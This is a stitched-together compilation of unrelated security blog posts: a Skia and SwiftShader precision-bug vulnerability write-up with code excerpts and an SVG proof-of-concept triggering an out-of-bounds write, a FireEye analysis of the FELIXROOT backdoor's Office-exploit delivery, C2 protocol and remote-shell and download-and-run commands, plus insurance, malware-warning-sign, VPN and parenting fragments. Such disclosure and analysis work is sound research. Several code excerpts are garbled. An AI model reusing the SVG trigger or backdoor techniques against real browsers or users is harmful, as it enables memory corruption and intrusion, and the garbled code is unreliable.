Instinctively, we’re fairly sure that the multiplicative implementation will be roughly correct, and that the implementation with iterative addition will be much less correct. Given that the space of possible inputs is small (Chrome disallows textures with width or height greater than 8192), we can just run a brute force over all ratios of source width to destination width, comparing the two algorithms, and seeing where the results are most different. (Note that SwiftShader also limits us to even numbers). This leads us to the values of 5828, 8132; and if we compare the computations in this case (left side is the iterative addition, right side is the multiplication):

0:    1.075012 1.075012
1:    1.791687 1.791687
1000: 717.749878 717.749878   Up to here (at the precision shown) the values are still identical
1001: 718.466553 718.466553
2046: 1467.391724 1467.391724 At this point, the first significant errors start to occur, but note
2047: 1468.108398 1468.108521 that the "incorrect" result is smaller than the more precise one.
2856: 2047.898315 2047.898438
2857: 2048.614990 2048.614990 Here our two computations coincide again, briefly, and from here onwards
2858: 2049.331787 2049.331787 the precision errors consistently favour a larger result than the more
2859: 2050.048584 2050.048340 precise calculation.
8129: 5827.567871 5826.924805
8130: 5828.284668 5827.641602
8131: 5829.001465 5828.358398 The last index is now sufficiently different that int conversion results in an oob index.

(Note also that there will also be error in the “safe” calculation; it’s just that the lack of error propagation means that that error will remain directly proportional to the size of the input error, which we expect to be “small.”)

We can indeed see that, the multiplicative algorithm would remain within bounds; but that the iterative algorithm can return an index that is outside the bounds of the input texture!

As a result, we read an entire row of pixels past the end of our texture allocation - and this can be easily leaked back to javascript using WebGL. Stay tuned for an upcoming blog post in which we’ll use this vulnerability together with another unrelated issue in SwiftShader to take control of the GPU process from javascript.


Skia is a graphics library used, among other places, in Chrome, Firefox and Android. In the web browsers it is used for example when drawing to a canvas HTML element using CanvasRenderingContext2D or when drawing SVG images. Skia is also used when drawing various other HTML elements, but canvas element and SVG images are more interesting from the security perspective because they enable more direct control over the objects being drawn by the graphic library.

The most complex type of object (and therefore, most interesting from the security perspective) that Skia can draw is a path. A path is an object that consists of elements such as lines, but also more complex curves, in particular quadratic or cubic splines.

Due to the way software drawing algorithms work in Skia, the precision issues are very much possible and quite impactful when they happen, typically leading to out-of-bounds writes.

To understand why these issues can happen, let’s assume you have an image in memory (represented as a buffer with size = width x height x color size). Normally, when drawing a pixel with coordinates (x, y) and color c, you would want to make sure that the pixel actually falls within the space of the image, specifically that 0 <= x < width and 0 <= y < height. Failing to check this could result in attempting to write the pixel outside the bounds of the allocated buffer. In computer graphics, making sure that only the objects in the image region are being drawn is called clipping.

So, where is the problem? Making a clip check for every pixel is expensive in terms of CPU cycles and Skia prides itself on speed. So, instead of making a clip check for every pixel, what Skia does is, it first makes the clip check on an entire object (e.g. line, path or any other type of object being drawn). Depending on the clip check, there are three possible outcomes:

  1. The object is completely outside of the drawing area: The drawing function doesn’t draw anything and returns immediately.

  1. The object is partially inside the drawing area: The drawing function proceeds with per-pixel clip enabled (usually by relying on SkRectClipBlitter).

  1. The entire object is in the drawing area: The drawing function draws directly into the buffer without performing per-pixel clip checks.

The problematic scenario is c) where the clip check is performed only per-object and the more precise, per-pixel checks are disabled. This means, if there is a precision issue somewhere between the per-object clip check and the drawing of pixels and if the precision issue causes the pixel coordinates to go outside of the drawing area, this could result in a security vulnerability.

We can see per-object clip checks leading to dropping per-pixel checks in several places, for example:

  • In hair_path (function for drawing a path without filling), clip is initially set to null (which disables clip checks). The clip is only set if the bounds of the path, rounded up and extended by 1 or 2 depending on the drawing options don’t fit in the drawing area. Extending the path bounds by 1 seems like a pretty large safety margin, but it is actually the least possible safe value because drawing objects with antialiasing on will sometimes result in drawing to nearby pixels.

  • In SkScan::FillPath (function for filling a path with antialiasing turned off), the bounds of the path are first extended by kConservativeRoundBias and rounded to obtain the “conservative” path bounds. A SkScanClipper object is then created for the current path. As we can see in the definition of SkScanClipper, it will only use SkRectClipBlitter if the x coordinates of the path bounds are outside the drawing area or if irPreClipped is true (which only happens when path coordinates are very large).

Similar patterns can be seen in other drawing functions.

Before we take a closer look at the issues, it is useful to quickly go over various number formats used by Skia:

  • SkScalar is a 32-bit floating point number

  • SkFDot6 is defined as an integer, but it is actually a fixed-point number with 26 bits to the left and 6 bits to the right of the decimal point. For example, SkFDot6 value of 0x00000001 represents the number 1/64.

  • SkFixed is also a fixed-point number, this time with 16 bits to the left and 16 bits to the right of the decimal point. For example, SkFixed value of 0x00000001 represents 1/(2**16)

Precision error with integer to float conversion

We discovered the initial problem when doing DOM fuzzing against Firefox last year. This issue where Skia wrote out-of-bounds caught our eye so we investigated further. It turned out the root cause was a discrepancy in the way Skia converted floating point to ints in several places. When making the per-path clip check, the lower coordinates (left and top of the bounding box) were rounded using this function:

static inline int round_down_to_int(SkScalar x) {
   double xx = x;
   xx -= 0.5;
   return (int)ceil(xx);

Looking at the code you see that it will return a number greater or equal to zero (which is necessary for passing the path-level clip check) for numbers that are strictly larger than -0.5. However, in another part of the code, specifically SkEdge::setLine if SK_RASTERIZE_EVEN_ROUNDING is defined (which is the case in Firefox), floats are rounded to integers differently, using the following function:

inline SkFDot6 SkScalarRoundToFDot6(SkScalar x, int shift = 0)
   union {
       double fDouble;
       int32_t fBits[2];
   } tmp;
   int fractionalBits = 6 + shift;
   double magic = (1LL << (52 - (fractionalBits))) * 1.5;

   tmp.fDouble = SkScalarToDouble(x) + magic;
   return tmp.fBits[1];
   return tmp.fBits[0];

Now let’s take a look at what these two functions return for a number -0.499. For this number, round_down_to_int returns 0 (which always passes the clipping check) and SkScalarRoundToFDot6 returns -32 which corresponds to -0.5, so we actually end up with a number that is smaller than the one we started with.

That’s not the only problem, though, because there’s another place where a precision error occurs in SkEdge::setLine.

Precision error when multiplying fractions

SkEdge::setLine calls SkFixedMul which is defined as:

static inline SkFixed(SkFixed a, SkFixed b) {
   return (SkFixed)((int64_t)a * b >> 16);

This function is for multiplying two SkFixed numbers. An issue comes up when using this function to multiply negative numbers. Let’s look at a small example. Let’s assume a = -1/(2**16) and b = 1/(2**16). If we multiply these two numbers on paper, the result is -1/(2**32). However, due to the way SkFixedMul works, specifically because the right shift is used to convert the result back to SkFixed format, the result we actually end up with is 0xFFFFFFFF which is SkFixed for  -1/(2**16). Thus, we end up with a result with a magnitude much larger than expected.

As the result of this multiplication is used by SkEdge::setLine to adjust the x coordinate of the initial line point here, we can use the issue in SkFixedMul to cause an additional error up to 1/64 of a pixel to go outside of the drawing area bounds.

By combining the previous two issues, it was possible to get the x coordinate of a line sufficiently small (smaller than -0.5), so that, when a fractional representation was rounded to an integer here, Skia attempted to draw at coordinates with x = -1, which is clearly outside the image bounds. This then led to an out-of-bounds write as can be seen in the original bug report. This bug could be exploited in Firefox by drawing an SVG image with coordinates as described in the previous section.

Floating point precision error when converting splines to line segments

When drawing paths, Skia is going to convert all non-linear curves (conic shapes, quadratic and cubic splines) to line segments. Perhaps unsurprisingly, these conversions suffer from precision errors.

The conversion of splines into line segments happen in several places, but the most susceptible to floating-point precision errors are hair_quad (used for drawing quadratic curves) and hair_cubic (used for drawing cubic curves). Both of these functions are called from hair_path, which we already mentioned above. Because (unsurprisingly), larger precision errors occur when dealing with cubic splines, we’ll only consider the cubic case here.

When approximating the spline, first the cubic coefficients are computed in SkCubicCoeff. The most interesting part is:

fA = P3 + three * (P1 - P2) - P0;
fB = three * (P2 - times_2(P1) + P0);
fC = three * (P1 - P0);
fD = P0;

Where P1, P2 and P3 are input points and fA, fB, fC and fD are output coefficients. The line segment points are then computed in hair_cubic using the following code

const Sk2s dt(SK_Scalar1 / lines);
Sk2s t(0);


Sk2s A = coeff.fA;
Sk2s B = coeff.fB;
Sk2s C = coeff.fC;
Sk2s D = coeff.fD;
for (int i = 1; i < lines; ++i) {
   t = t + dt;
   Sk2s p = ((A * t + B) * t + C) * t + D;[i]);

Where p is the output point and lines is the number of line segments we are using to approximate the curve. Depending on the length of the spline, a cubic spline can be approximated with up to 512 lines.

It is obvious that the arithmetic here is not going to be precise. As identical computations happen for x and y coordinates, let’s just consider the x coordinate in the rest of the post.

Let’s assume the width of the drawing area is 1000 pixels. Because hair_path is used for drawing path with antialiasing turned on, it needs to make sure that all points of the path are between 1 and 999, which is done in the initial, path-level clip check. Let’s consider the following coordinates that all pass this check:

p0 = 1.501923
p1 = 998.468811
p2 = 998.998779
p3 = 999.000000

For these points, the coefficients are as follows

a = 995.908203
b = -2989.310547
c = 2990.900879
d = 1.501923

If you do the same computation in larger precision, you’re going to notice that the numbers here aren’t quite correct. Now let’s see what happens if we approximate the spline with 512 line segments. This results in 513 x coordinates:

0: 1.501923
1: 7.332130
2: 13.139574
3: 18.924301
4: 24.686356
5: 30.425781
500: 998.986389
501: 998.989563
502: 998.992126
503: 998.994141
504: 998.995972
505: 998.997314
506: 998.998291
507: 998.999084
508: 998.999695
509: 998.999878
510: 999.000000
511: 999.000244
512: 999.000000

We can see that the x coordinate keeps growing and at point 511 clearly goes outside of the “safe” area and grows larger than 999.

As it happens, this isn’t sufficient to trigger an out-of-bounds write, because, due to how drawing antialiased lines works in Skia, we need to go at least 1/64 of a pixel outside of the clip area for it to become a security issue. However, an interesting thing about the precision errors in this case is that the larger the drawing area, the larger the error that can happen.

So let’s instead consider a drawing area of 32767 pixels (maximum canvas size in Chrome). The initial clipping check then checks that all path points are in the interval [1, 32766]. Now let’s consider the following points:

p0 = 1.7490234375
p1 = 32765.9902343750
p2 = 32766.000000
p3 = 32766.000000

The corresponding coefficients

a = 32764.222656
b = -98292.687500
c = 98292.726562
d = 1.749023

And the corresponding line approximation

0: 1.74902343
1: 193.352295
2: 384.207123
3: 574.314941
4: 763.677246
5: 952.295532
505: 32765.925781
506: 32765.957031
507: 32765.976562
508: 32765.992188
509: 32766.003906
510: 32766.003906
511: 32766.015625
512: 32766.000000

You can see that we went out-of-bounds significantly more at index 511.

Fortunately for Skia and unfortunately for aspiring attackers, this bug can’t be used to trigger memory corruption, at least not in the up-to-date version of skia. The reason is SkDrawTiler. Whenever Skia draws using SkBitmapDevice (as opposed to using a GPU device) and the drawing area is larger than 8191 pixels in any dimension, instead of drawing the whole image at once, Skia is going to split it into tiles of size (at most) 8191x8191 pixels. This change was made in March, not for security reasons, but to be able to support larger drawing surfaces. However, it still effectively prevented us from exploiting this issue and will also prevent exploiting other cases where a surface larger than 8191 is required to reach the precision error of a sufficient magnitude.

Still, this bug was exploitable before March and we think it nicely demonstrates the concept of precision errors.

Integer precision error when converting splines to line segments

There is another place where splines are approximated as line segments when drawing (in this case: filling) paths that was also affected by a precision error, in this case an exploitable one. Interestingly, here the precision error wasn’t in floating-point but rather in fixed-point arithmetic.

The error happens in SkQuadraticEdge::setQuadraticWithoutUpdate and SkCubicEdge::setCubicWithoutUpdate. For simplicity, we are again going to concentrate just on the cubic spline version and, again, only on the x coordinate.

In SkCubicEdge::setCubicWithoutUpdate, the curve coordinates are first converted to SkFDot6 type (integer with 6 bits used for fraction). After that, parameters corresponding to the first, second and third derivative of the curve at the initial point are going to be computed:

SkFixed B = SkFDot6UpShift(3 * (x1 - x0), upShift);
SkFixed C = SkFDot6UpShift(3 * (x0 - x1 - x1 + x2), upShift);
SkFixed D = SkFDot6UpShift(x3 + 3 * (x1 - x2) - x0, upShift);

fCx     = SkFDot6ToFixed(x0);
fCDx    = B + (C >> shift) + (D >> 2*shift);    // biased by shift
fCDDx   = 2*C + (3*D >> (shift - 1));           // biased by 2*shift
fCDDDx  = 3*D >> (shift - 1);                   // biased by 2*shift

Where x0, x1, x2 and x3 are x coordinates of the 4 points that define the cubic spline and shift and upShift depend on the length of the curve (this corresponds to the number of linear segments the curve is going to be approximated in). For simplicity, we can assume shift = upShift = 6 (maximum possible values).

Now let’s see what happens for some very simple input values:

x0 = -30
x1 = -31
x2 = -31
x3 = -31

Note that x0, x1, x2 and x3 are of the type SkFDot6 so value -30 corresponds to -0.46875 and -31 to -0.484375. These are close to -0.5 but not quite and are thus perfectly safe when rounded. Now let’s examine the values of the computed parameters:

B = -192
C = 192
D = -64

fCx = -30720
fCDx = -190
fCDDx = 378
fCDDDx = -6

Do you see where the issue is? Hint: it’s in the formula for fCDx.

When computing fCDx (first derivation of a curve), the value of D needs is right-shifted by 12. However, D is too small to do that precisely, and since D is negative, the right shift

D >> 2*shift

Is going to result in -1, which is larger in magnitude than the intended result. (Since D is of type SkFixed its actual value is -0.0009765625 and the shift, when interpreted as division by 4096, would result in -2.384185e-07). Because of this, the whole fCDx ends up as a larger negative value than it should (-190 vs. -189.015).

Afterwards, the value of fCDx gets used when calculating the x value of line segments. This happens in SkCubicEdge::updateCubic on this line:

newx    = oldx + (fCDx >> dshift);

The x values, when approximating the spline with 64 line segments (maximum for this algorithm), are going to be (expressed as index, integer SkFixed value and the corresponding floating point value):

index raw      interpretation
0:    -30720   -0.46875
1:    -30768   -0.469482
2:    -30815   -0.470200
3:    -30860   -0.470886
4:    -30904   -0.471558
5:    -30947   -0.472214
31:   -31683   -0.483444
32:   -31700   -0.483704
33:   -31716   -0.483948
34:   -31732   -0.484192
35:   -31747   -0.484421
36:   -31762   -0.484650
37:   -31776   -0.484863
38:   -31790   -0.485077
60:   -32005   -0.488358
61:   -32013   -0.488480
62:   -32021   -0.488602
63:   -32029   -0.488724
64:   -32037   -0.488846

You can see that for the 35th point, the x value (-0.484421) ends up being smaller than the smallest input point (-0.484375) and the trend continues for the later points. This value would still get rounded to 0 though, but there is another problem.

The x values computed in SkCubicEdge::updateCubic are passed to SkEdge::updateLine, where they are converted from SkFixed type to SkFDot6 on the following lines:

x0 >>= 10;
x1 >>= 10;

Another right shift! And when, for example, SkFixed value -31747 gets shifted we end up with SkFDot6 value of -32 which represents -0.5.

At this point we can use the same trick described above in the “Precision error when multiplying fractions” section to go smaller than -0.5 and break out of the image bounds. In other words, we can make Skia draw to x = -1 when drawing a path.

But, what can we do with it?

In general, given that Skia allocates image pixels as a single allocation that is organized row by row (as most other software would allocate bitmaps), there are several cases of what can happen with precision issues. If we assume an width x height image and that we are only able to go one pixel out of bounds:

  1. Drawing to y = -1 or y = height immediately leads to heap out-of-bounds write
  2. Drawing to x = -1 with y = 0 immediately leads to a heap underflow of 1 pixel
  3. Drawing to x = width with y = height - 1 immediately leads to heap overflow of 1 pixel
  4. Drawing to x = -1 with y > 0 leads to a pixel “spilling” to the previous image row
  5. Drawing to x = height with y < height-1 leads to a pixel “spilling” to the next image row

What we have here is scenario d) - unfortunately we can’t draw to x = 1 with y = 0 because the precision error needs to accumulate over the growing values of y.

Let’s take a look at the following example SVG image:

<svg width="100" height="100" xmlns="">
body {
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
margin-left: 0px
<path d="M -0.46875 -0.484375 C -0.484375 -0.484375, -0.484375 -0.484375, -0.484375 100 L 1 100 L 1 -0.484375" fill="red" shape-rendering="crispEdges" />

If we render this in an unpatched version of Firefox what we see is shown in the following image. Notice how the SVG only contains coordinates on the left side of the screen, but some of the red pixels get drawn on the right. This is because, due to the way images are allocated, drawing to x = -1 and y = row is equal to drawing to x = width - 1 and y = row - 1.

Opening an SVG image that triggers a Skia precision issue in Firefox. If you look closely you’ll notice some red pixels on the right side of the image. How did those get there? :)

Note that we used Mozilla Firefox and not Google Chrome because, due to SVG drawing internals (specifically: Skia seems to draw the entire image at once, while Chrome uses additional tiling) it is easier to demonstrate the issue in Firefox. However, both Chrome and Firefox were equally affected by this issue.

But, other than drawing a funny image, is there real security impact to this issue? Here, SkARGB32_Shader_Blitter comes to the rescue (SkARGB32_Shader_Blitter is used whenever shader effects are applied to a color in Skia). What is specific about SkARGB32_Shader_Blitter is that it allocates a temporary buffer of the same size as a single image row. When SkARGB32_Shader_Blitter::blitH is used to draw an entire image row, if we can make it draw from x = -1 to x = width - 1 (alternately from x = 0 to x = width), it will need to write width + 1 pixels into a buffer that can only hold width pixels, leading to a buffer overflow as can be seen in the ASan log in the bug report.

Note how the PoCs for Chrome and Firefox contain SVG images with a linearGradient element - the linear gradient is used specifically to select SkARGB32_Shader_Blitter instead of drawing pixels to the image directly, which would only result in pixels spilling to the previous row.

Another specific of this issue is that it can only be reached when drawing (more specifically: filling) paths with antialiasing turned off. As it is not currently possible to draw paths to a HTML canvas elements with antialiasing off (there is an imageSmoothingEnabled property but it only applies to drawing images, not paths), an SVG image with shape-rendering="crispEdges" must be used to trigger the issue.

All precision issues we reported in Skia were fixed by increasing kConservativeRoundBias. While the current bias value is large enough to cover the maximum precision errors we know about, we should not dismiss the possibility of other places where precision issues can occur.


While precision issues, such as described in this blog post, won’t be present in most software products, where they are present they can have quite serious consequences. To prevent them from occurring:

  • Don’t use floating-point arithmetic in cases where the result is security-sensitive. If you absolutely have to, then you need to make sure that the maximum possible precision error cannot be larger than some safety margin. Potentially, interval arithmetic could be used to determine the maximum precision error in some cases. Alternately, perform security checks on the result rather than input.

  • With integer arithmetic, be wary of any operations that can reduce the precision of the result, such as divisions and right shifts.

When it comes to finding such issues, unfortunately, there doesn’t seem to be a great way to do it. When we started looking at Skia, initially we wanted to try using symbolic execution on the drawing algorithms to find input values that would lead to drawing out-of-bounds, as, on the surface, it seemed this is a problem symbolic execution would be well suited for. However, in practice, there were too many issues: most tools don’t support floating point symbolic variables and, even when running against just the integer parts of the simplest line drawing algorithm, we were unsuccessful in completing the run in a reasonable time (we were using KLEE with STP and Z3 backends).

In the end, what we ended up doing was a combination of the more old-school methods: manual source review, fuzzing (especially with values close to image boundaries) and, in some cases, when we already identified potentially problematic areas of code, even bruteforcing the range of all possible values.

Do you know of other instances where precision errors resulted in security issues? Let us know about them in the comments.

Offensive Security Online Exam Proctoring

When we started out with our online training courses over 12 years ago, we made hard choices about the nature of our courses and certifications. We went against the grain, against the common certification standards, and came up with a unique certification model in the field - "Hands-on, practical certification". Twelve years later, these choices have paid off. The industry as a whole has realized that most of the multiple choice, technical certifications do not necessarily guarantee a candidate's technical level...and for many in the offensive security field, the OSCP has turned into a golden industry standard. This has been wonderful for certification holders as they find themselves actively recruited by employers due to the fact that they have proven themselves as being able to stand up to the stress of a hard, 24-hour exam - and still deliver a quality report.

Insurance Occurrence Assurance?

You may have seen my friend Brian Krebs’ post regarding the lawsuit filed last month in the Western District of Virginia after $2.4 million was stolen from The National Bank of Blacksburg from two separate breaches over an eight-month period. Though the breaches are concerning, the real story is that the financial institution suing its insurance provider for refusing to fully cover the losses.

From the article:

In its lawsuit (PDF), National Bank says it had an insurance policy with Everest National Insurance Company for two types of coverage or “riders” to protect it against cybercrime losses. The first was a “computer and electronic crime” (C&E) rider that had a single loss limit liability of $8 million, with a $125,000 deductible.

The second was a “debit card rider” which provided coverage for losses which result directly from the use of lost, stolen or altered debit cards or counterfeit cards. That policy has a single loss limit of liability of $50,000, with a $25,000 deductible and an aggregate limit of $250,000.

According to the lawsuit, in June 2018 Everest determined both the 2016 and 2017 breaches were covered exclusively by the debit card rider, and not the $8 million C&E rider. The insurance company said the bank could not recover lost funds under the C&E rider because of two “exclusions” in that rider which spell out circumstances under which the insurer will not provide reimbursement.

Cyber security insurance is still in its infancy and issues with claims that could potentially span multiple policies and riders will continue to happen – think of the stories of health insurance claims being denied for pre-existing conditions and other loopholes. This, unfortunately, is the nature of insurance. Legal precedent, litigation, and insurance claim issues aside, your organization needs to understand that cyber security insurance is but one tool to reduce the financial impact on your organization when faced with a breach.

Cyber security insurance cannot and should not, however, be viewed as your primary means of defending against an attack.

The best way to maintain a defensible security posture is to have an information security program that is current, robust, and measurable. An effective information security program will provide far more protection for the operational state of your organization than cyber security insurance alone. To put it another way, insurance is a reactive measure whereas an effective security program is a proactive measure.

If you were in a fight, would you want to wait and see what happens after a punch is thrown to the bridge of your nose? Perhaps you would like to train to dodge or block that punch instead? Something to think about.

Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign

Campaign Details

In September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.

FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine. Figure 1 shows the attack overview.

Figure 1: Attack overview

The malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named “Seminar.rtf”. It exploits CVE-2017-0199 to download the second stage payload from (Figure 3). The downloaded file is weaponized with CVE-2017-11882.

Figure 2: Lure documents

Figure 3: Hex dump of embedded URL in Seminar.rtf

Figure 4 shows the first payload trying to download the second stage Seminar.rtf.

Figure 4: Downloading second stage Seminar.rtf

The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable. This file drops the executable at %temp% (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9), which is used to drop and execute the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).

The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.

Figure 5: Command in LNK file

The embedded backdoor component is encrypted using custom encryption. The file is decrypted and loaded directly in memory without touching the disk.

Technical Details

After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.

Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. Decryption logic used for ASCII strings is shown in Figure 6.

Figure 6: ASCII decryption routine

Decryption logic used for Unicode strings is shown in Figure 7.

Figure 7: Unicode decryption routine

Upon execution, a new thread is created where the backdoor sleeps for 10 minutes. Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If the malware was launched by RUNDLL32.exe with parameter #1, then it proceeds with initial system triage before doing command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace.

Figure 8 shows the full operation.

Figure 8: Initial execution process of backdoor component

Table 1 shows the classes referred from the “ROOT\CIMV2” and “Root\SecurityCenter2” namespace.

WMI Namespaces









Table 1: Referred classes

WMI Queries and Registry Keys Used

  1. SELECT Caption FROM Win32_TimeZone
  2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem
  3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem

Registry entries are read for potential administration escalation and proxy information.

  1. Registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ” is queried to check the values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop.
  2. Registry key “Software\Microsoft\Windows\CurrentVersion\Internet Settings\” is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer.

Table 2 shows FELIXROOT backdoor capabilities. Each command is performed in an individual thread.




Fingerprint System via WMI and Registry


Drop File and execute


Remote Shell


Terminate connection with C2


Download and run batch script


Download file on machine


Upload File

Table 2: FELIXROOT backdoor commands

Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.

Figure 9: Command logs after execution

Network Communications

FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server (Figure 10).

Figure 10: POST request to C2 server

All other fields, such as User-Agents, Content-Type, and Accept-Encoding, that are part of the request / response header are XOR encrypted and present in the malware. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are “1.3” and “KdfrJKN”. The value “KdfrJKN” may be used as identification for the campaign and is found in the JOSN object in the file (Figure 11).

Figure 11: Host information used in every communication

The FELIXROOT backdoor has three parameters for C2 communication. Each parameter provides information about the task performed on the target machine (Table 3).




This parameter contains target machine information in the following format:

<Computer Name>, <User Name>, <Windows Versions>, <Processor Architecture>, <1.3>, < KdfrJKN >, <Volume Serial Number>


This parameter includes the information about the command executed and its results.


This parameter contains the information about data associated with the C2 server.

Table 3: FELIXROOT backdoor parameters


All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.

Figure 12: RSA public key 1

Figure 13: RSA public key 2

Figure 14: AES encryption parameters

After encryption, the cipher text to be sent over C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.

Figure 15: Structure used to send data to server

Figure 16: Structure used to send data to C2 server

The structure is converted to Base64 using the CryptBinaryToStringA function.

FELIXROOT backdoor contains several commands for specific tasks. After execution of every task, the malware sleeps for one minute before executing the next task. Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine:

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
  3. Deletes the dropper components from the system.


CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected. At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. We also advise that all industries remain on alert, as the threat actors involved in this campaign may eventually broaden the scope of their current targeting.


Indicators of Compromise












Network Indicators of Compromise

Accept-Encoding: gzip, deflate

content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Configuration Files

Version 1:

{"1" : "","2" : "30","4" : "GufseGHbc","6" : "3", "7" :


Version 2:

{"1" : "","2" : "30","4" : "KdfrJKN","6" : "3", "7" :


FireEye Detections

































Table 5: FireEye Detections


Special thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.

Top 10 Signs of a Malware Infection on Your PC

Not all viruses that find their way onto your computer dramatically crash your machine. Instead, there are viruses that can run in the background without you even realizing it. As they creep around, they make messes, steal, and much worse.

Malware today spies on your every move. It sees the websites you visit, and the usernames and passwords you type in. If you login to online banking, a criminal can watch what you do and after you log off and go to bed, he can log right back and start transferring money out of your account.

Here are some signs that your device might already be infected with malware:

  1. Programs shut down or start up automatically
  2. Windows suddenly shuts down without prompting
  3. Programs won’t start when you want them to
  4. The hard drive is constantly working
  5. Your machine is working slower than usual
  6. Messages appear spontaneously
  7. Instead of flickering, your external modem light is constantly lit
  8. Your mouse pointer moves by itself
  9. Applications are running that are unfamiliar
  10. Your identity gets stolen

If you notice any of these, first, don’t panic. It’s not 100% that you have a virus. However, you should check things out. Make sure your antivirus program is scanning your computer regularly and set to automatically download software updates. This is one of the best lines of defense you have against malware.

Though we won’t ever eliminate malware, as it is always being created and evolving, by using antivirus software and other layers of protection, you can be one step ahead. Here are some tips:

  • Run an automatic antivirus scan of your computer every day. You can choose the quick scan option for this. However, each week, run a deep scan of your system. You can run them manually, or you can schedule them.
  • Even if you have purchased the best antivirus software on the market, if you aren’t updating it, you are not protected.
  • Don’t click on any attachment in an email, even if you think you know who it is from. Instead, before you open it, confirm that the application was sent by who you think sent it, and scan it with your antivirus program.
  • Do not click on any link seen in an email, unless it is from someone who often sends them. Even then, be on alert as hackers are quite skilled at making fake emails look remarkably real. If you question it, make sure to open a new email and ask the person. Don’t just reply to the one you are questioning. Also, never click on any link that is supposedly from your bank, the IRS, a retailer, etc. These are often fake.
  • If your bank sends e-statements, ignore the links and login directly to the banks website using either a password manager or your bookmarks.
  • Set your email software to “display text only.” This way, you are alerted before graphics or links load.

When a device ends up being infected, it’s either because of hardware or software vulnerabilities. And while there are virus removal tools to clean up any infections, there still may be breadcrumbs of infection that can creep back in. It’s generally a good idea to reinstall the devices operating system to completely clear out the infection and remove any residual malware .

As an added bonus, a reinstall will remove bloatware and speed up your devices too.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of a cybersecurity speaking and consulting firm based in Massachussets. See him discussing internet and wireless security on Good Morning America.

OVPN review: An ideal VPN except for one big drawback

OVPN in brief:

P2P allowed: Yes
Business location: Stockholm, Sweden
Number of servers: 56
Number of country locations: 7
Cost: $84 per year
VPN protocol: OpenVPN
Data encryption: AES-256-GCM
Data authentication: SHA1 HMAC
Handshake encryption: TLSv1.2

One of the big questions many people have about a VPN service is just how well they can trust a company’s no-logging claim. OVPN tries to allay that concern as much as possible by running its own small network of servers in seven countries.

To read this article in full, please click here

“Here Be Dragons”, Keeping Kids Safe Online

Sitting here this morning sipping my coffee, I watched fascinated as my 5-year-old daughter set up a VPN connection on her iPad while munching on her breakfast out of absent-minded necessity.

